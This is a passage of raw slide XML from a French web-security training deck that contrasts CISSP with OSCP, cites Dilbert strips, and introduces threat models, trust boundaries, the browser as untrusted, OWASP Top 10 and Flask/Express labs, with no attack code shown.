              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Et il a besoin qu’on le croie compétent : il vous balance les mots-clés LinkedIn du trimestre, et l’IA n’est pas si extraordinaire — il sait, il est CISO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le CISSP est un excellent diplôme si vous aimez les PowerPoint, les politiques de 47 pages et les comités qui n’impactent jamais le code réellement déployé.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3648456"/>
            <a:ext cx="73152" cy="2020824"/>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1078992" y="3648456"/>
            <a:ext cx="5989320" cy="2020824"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3776472"/>
            <a:ext cx="5532120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ici, on fait l’inverse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4105656"/>
            <a:ext cx="5532120" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On regarde le code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On casse ce qui est cassable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On répare ce qui doit l’être.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On garde les réunions pour plus tard.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="dilbert-manager.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7406640" y="1554479"/>
            <a:ext cx="3794760" cy="3794760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7406640" y="5404103"/>
            <a:ext cx="3794760" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dilbert  ·  © Scott Adams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01 · illustration</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The Noncommittal Committee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="dilbert-committee.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10149840" cy="3157728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4328159"/>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Dilbert, 20 décembre 2013  ·  © Scott Adams / Universal Uclick  ·  « Make a decision. »</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10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>05 · aller plus loin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="10058400" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CISSP, c’est un examen. OSCP, c’est un métier.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>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517904"/>
            <a:ext cx="10058400" cy="1965960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le CISSP s’apprend pour passer. Politiques, comités, PDF de 47 pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OSCP (PEN-200) : un examen de 24 h. Il faut casser des machines pour de vrai. Les outils aident. Ils ne passent pas l’examen à votre place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>« The point of the training isn’t to teach you how to pass the exam. It’s to teach you to pentest. »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3648456"/>
            <a:ext cx="73152" cy="2020824"/>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1078992" y="3648456"/>
            <a:ext cx="9921240" cy="2020824"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3776472"/>
            <a:ext cx="9464040" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PEN-200  ·  OffSec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4105656"/>
            <a:ext cx="9464040" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cours OSCP. Extrait gratuit du module d’introduction, pour ceux qui veulent voir le ton.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4837176"/>
            <a:ext cx="9464040" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>offsec.com/courses/pen-200  —  le cours</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5129784"/>
            <a:ext cx="9464040" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>PDF  ·  PEN-200 Module, General Course Information (extrait gratuit)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05</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Alors, pourquoi le navigateur est « hostile » ?</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Pas parce que Chrome est malveillant. Parce que tout ce qui s’y exécute n’est pas sous votre contrôle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le DOM exécute du JS que vous n’avez pas forcément écrit (pub, extension, XSS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DevTools, une extension, un XSS : tout ce que JavaScript peut lire, quelqu’un d’autre peut le lire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Chaque requête « depuis le navigateur » peut être forgée, rejouée, ou partir d’un autre site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="1403146" cy="443484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47688" y="1280160"/>
            <a:ext cx="1220266" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647688" y="1691640"/>
            <a:ext cx="1220266" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exécute du JS que vous n'avez pas forcément écrit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099526" y="1051560"/>
            <a:ext cx="1403146" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>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09254" y="1280160"/>
            <a:ext cx="1220266" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DevTools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209254" y="1691640"/>
            <a:ext cx="1220266" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L'utilisateur, une extension, un XSS : tout ce que JS voit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9661093" y="1051560"/>
            <a:ext cx="1403146" cy="443484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770821" y="1280160"/>
            <a:ext cx="1220266" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9770821" y="1691640"/>
            <a:ext cx="1220266" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Toute requête « du navigateur » peut être forgée ou rejouée.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expliquer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qu’est un threat model</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qu’est une trust boundary</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le navigateur et les données utilisateur sont hostiles par défaut</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3749040"/>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97280" y="3858768"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3877056"/>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à quoi sert réellement OWASP Top 10 (carte, pas dogme)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Threat model &amp; trust boundaries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expliquer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qu’est un threat model</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Qui peut faire quoi, à quoi, et ce que vous acceptez comme risque.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2414015"/>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2374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54203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qu’est une trust boundary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="2871215"/>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De ce côté on fait confiance. De l’autre, on valide. Toujours.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3218687"/>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328415"/>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346703"/>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le navigateur et les données utilisateur sont hostiles par défaut</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3675887"/>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L’utilisateur, une extension, un XSS : ils voient ce que JS voit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4023359"/>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97280" y="4133087"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="4151375"/>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à quoi sert réellement OWASP Top 10 (carte, pas dogme)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="4480559"/>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Une carte des erreurs fréquentes. Pas une religion, pas une checklist magique.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02</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Cookies, sessions, localStorage</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talk + labs  ·  site hébergé  ·  Flask et Express en local</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02 · Flask</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Flask, c’est quoi ?</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3832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Un framework web Python. Une route, un JSON, un cookie. C’est tout ce qu’on lui demande ici.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Moins de magie que certains outils : pas de /docs tout seul, pas de types gratuits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Les labs : python-flask à côté de node-express. Même faille, deux stacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5074920"/>
            <a:ext cx="6035040" cy="292608"/>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local  ·  day-1/s2_intro/python-flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="4526280" cy="443484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537960" y="1051560"/>
            <a:ext cx="64008" cy="443484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39128" y="1124712"/>
            <a:ext cx="4251960" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s2_intro / python-flask  ·  le login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6739128" y="1362456"/>
